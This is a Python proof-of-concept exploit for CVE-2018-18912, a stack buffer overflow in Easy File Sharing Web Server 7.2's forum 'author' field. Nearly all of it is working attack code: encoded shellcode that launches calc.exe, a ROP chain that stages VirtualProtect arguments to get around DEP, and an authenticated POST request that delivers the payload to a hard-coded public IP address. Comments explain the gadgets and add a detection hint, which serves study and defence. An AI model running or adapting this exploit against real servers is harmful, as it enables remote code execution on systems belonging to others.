# Exploit Title: Easy File Sharing Web Server 7.2 - 'author' Remote Buffer Overflow (SEH)
# Date: November 5, 2018
# Exploit Author: Kristijan Antic
# Vendor Homepage: http://www.sharing-file.com/
# Software Link: http://www.sharing-file.com/efssetup.exe
# Version: 7.2
# Tested on: Windows 10.0.17134 x64
# CVE : CVE-2018-18912
# 1. Description: An issue was discovered in Easy File Sharing (EFS) Web Server 7.2.
# A stack-based buffer overflow vulnerability occurs when an authenticated user sends
# a malicious POST request to forum.ghp upon creating a new topic in
# the forums, which allows remote attackers to execute arbitrary code.
# 2. Proof of Concept
import socket
import struct
# Target of the PoC, hard-coded for the author's test setup.  Note that the
# Host: header built further down names a different address, so HOST/PORT
# alone decide where the request is actually sent.
HOST = '81.82.253.190'
PORT = 81
def p32(v):
    """Pack integer ``v`` as a 4-byte little-endian unsigned value (``"<L"``)."""
    packed = struct.pack("<L", v)
    return packed
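def send_malformed_buffer(data):
    """Open a TCP connection to HOST:PORT, transmit ``data`` once and close.

    Args:
        data: the complete request to write to the socket.

    Raises:
        socket.error: if the connection or the write fails.  The socket is
            closed in ``finally`` either way (the original version leaked the
            descriptor when connect() or send() raised).
    """
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:
        s.connect((HOST, PORT))
        # sendall() loops until every byte is written; send() may return
        # after writing only a prefix of a multi-KB buffer.
        s.sendall(data)
    finally:
        s.close()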
# ---- Payload ----
# Shellcode exactly as emitted by the msfvenom command below: windows/exec
# launching calc.exe, encoded to avoid the listed bad characters.  The PoC
# therefore only demonstrates code execution with a visible, benign effect.
#msfvenom.bat -p windows/exec cmd=calc.exe -b '\xff\x2c\x00\x7e\x3a\x22\x0a\x0d\x20\x2f\x5c\x2e\x3d\x25\x2b\x26' -v shellcode -f python
shellcode = ""
shellcode += "\x6a\x31\x59\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73"
shellcode += "\x13\x90\xaa\xb9\xe4\x83\xeb\xfc\xe2\xf4\x6c\x42"
shellcode += "\x3b\xe4\x90\xaa\xd9\x6d\x75\x9b\x79\x80\x1b\xfa"
shellcode += "\x89\x6f\xc2\xa6\x32\xb6\x84\x21\xcb\xcc\x9f\x1d"
shellcode += "\xf3\xc2\xa1\x55\x15\xd8\xf1\xd6\xbb\xc8\xb0\x6b"
shellcode += "\x76\xe9\x91\x6d\x5b\x16\xc2\xfd\x32\xb6\x80\x21"
shellcode += "\xf3\xd8\x1b\xe6\xa8\x9c\x73\xe2\xb8\x35\xc1\x21"
shellcode += "\xe0\xc4\x91\x79\x32\xad\x88\x49\x83\xad\x1b\x9e"
shellcode += "\x32\xe5\x46\x9b\x46\x48\x51\x65\xb4\xe5\x57\x92"
shellcode += "\x59\x91\x66\xa9\xc4\x1c\xab\xd7\x9d\x91\x74\xf2"
shellcode += "\x32\xbc\xb4\xab\x6a\x82\x1b\xa6\xf2\x6f\xc8\xb6"
shellcode += "\xb8\x37\x1b\xae\x32\xe5\x40\x23\xfd\xc0\xb4\xf1"
shellcode += "\xe2\x85\xc9\xf0\xe8\x1b\x70\xf5\xe6\xbe\x1b\xb8"
shellcode += "\x52\x69\xcd\xc0\xb8\x69\x15\x18\xb9\xe4\x90\xfa"
shellcode += "\xd1\xd5\x1b\xc5\x3e\x1b\x45\x11\x49\x51\x32\xfc"
shellcode += "\xd1\x42\x05\x17\x24\x1b\x45\x96\xbf\x98\x9a\x2a"
shellcode += "\x42\x04\xe5\xaf\x02\xa3\x83\xd8\xd6\x8e\x90\xf9"
shellcode += "\x46\x31\xf3\xcb\xd5\x87\xbe\xcf\xc1\x81\x90\xaa"
shellcode += "\xb9\xe4"
# ---====GADGETS====---
# Absolute gadget addresses, i.e. the chain relies on modules loaded at a
# fixed base (one gadget below is annotated "[ImageLoad.dll]"; the 0x61cxxxxx
# addresses presumably come from a second non-relocated module — TODO confirm).
# From a defensive standpoint this is why ASLR/DEP-aware rebuilds of the
# bundled DLLs, or removing the product, break the PoC outright.
# pop_esi_retn and pop_ebx_retn are defined but never used in the chain below.
ropnop = 0x1001a858
pop_eax_retn = 0x10015442
stack_pivot_addr = 0x10022869
pop_esi_retn = 0x1001c8e4
pop_ebx_retn = 0x10012F3C
pop_ecx_retn = 0x1001FC4C
neg_eax_retn = 0x100231cd
add_ebx_eax = 0x1001DA09
pop_edi_retn = 0x1001A648
xor_edx_edx = 0x10022C4C
inc_edx = 0x61c059a0
pop_ebp_retn = 0x1001add7
push_esp_retn = 0x61c24169
pushad_retn = 0x100240c2
# ---- Buffer layout (value of the `author` form field) ----
# NOTE: str/bytes concatenation below is Python 2 semantics; struct.pack()
# output is appended to a str, which raises TypeError on Python 3.
ropchain = ''
buff = 'A' * 64
buff += 'BBBB' # nSEH slot (not executed; the pivot gadget bypasses it)
buff += struct.pack("<L", stack_pivot_addr) # SEH handler slot -> stack pivot gadget
buff += 'F' * 2348 # filler between the SEH record and the ROP chain
# ---- ROP chain ----
# Loads a pointer, dereferences it via MOV EAX,[EAX] (per the inline comment,
# presumably resolving an address at runtime — not stated on the page), then
# runs three further uncommented gadgets.
ropchain += p32(pop_eax_retn)
ropchain += p32(0x61c832d0) #need to deref
ropchain += p32(0x1002248c) # MOV EAX,DWORD PTR DS:[EAX] # RETN [ImageLoad.dll]
ropchain += p32(0x61c18d81)
ropchain += p32(0x1001d626)
ropchain += p32(0x10021a3e)
# The register names in the comments that follow (NewProtect, lpOldProtect,
# dwSize) match the VirtualProtect parameter list; the chain appears to stage
# those arguments in registers and drop them onto the stack with PUSHAD.
#EBP = ReturnTo() rop gadget to push esp ret
ropchain += p32(pop_ebp_retn)
ropchain += p32(push_esp_retn)
#EDX = NewProtect(0x40): zero EDX, then 64 increments (no literal 0x40 is
# used, presumably to stay clear of the bad-character list above).
ropchain += p32(xor_edx_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
#ECX = lpOldProtect (ptr to writable address)
ropchain += p32(pop_ecx_retn)
ropchain += p32(0x61c730ad)
#EBX = dwSize: EAX = -2, negated to 2, then added into EBX (avoids a literal
# small constant in the chain).
ropchain += p32(pop_eax_retn)
ropchain += p32(0xFFFFFFFE)
ropchain += p32(neg_eax_retn)
ropchain += p32(add_ebx_eax)
#EDI = ROP NOP
ropchain += p32(pop_edi_retn)
ropchain += p32(ropnop)
#EAX = NOP (0x90909090)
ropchain += p32(pop_eax_retn)
ropchain += p32(0x10027010) #will inc one byte at this addr
ropchain += p32(pop_eax_retn)
ropchain += p32(0x90909090)
#PUSHAD: pushes EAX..EDI so the staged registers become the call frame.
ropchain += p32(pushad_retn)
ropchain += '\x90' * 4
ropchain += shellcode
buff += ropchain
# ---- HTTP request ----
# The vulnerable endpoint is reached only with valid forum credentials: the
# Cookie line carries UserID/PassWD and a SESSIONID, i.e. this is an
# authenticated (post-login) overflow as the header comment states.
# Detection hint: a POST to /forum.ghp whose `author` parameter is several
# kilobytes long and contains long runs of a single byte is not a legitimate
# topic submission.
request = ''
request += "POST /forum.ghp?forumid=1 HTTP/1.1\r\n"
request += "Host: 192.168.184.1\r\n"
request += "Content-Type: application/x-www-form-urlencoded\r\n"
request += "User-Agent: Mozilla/5.0\r\n"
request += "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8\r\n"
request += "Accept-Language: en-US,en;q=0.9\r\n"
request += "Cookie: UserID=hacker; PassWD=hacker; frmUserName=; frmUserPass=; rememberPass=202%2C197%2C208%2C215%2C201; SESSIONID=14677\r\n"
request += "Connection: close\r\n"
request += "\r\n"
# No Content-Length header is sent; the body is terminated by closing the
# connection.  The overflowing value is the `author` field.
request += "author="+buff+"&passwd=hacker&title=bbbb&content=ffff&Submit=Submit\r\n"
send_malformed_buffer(request)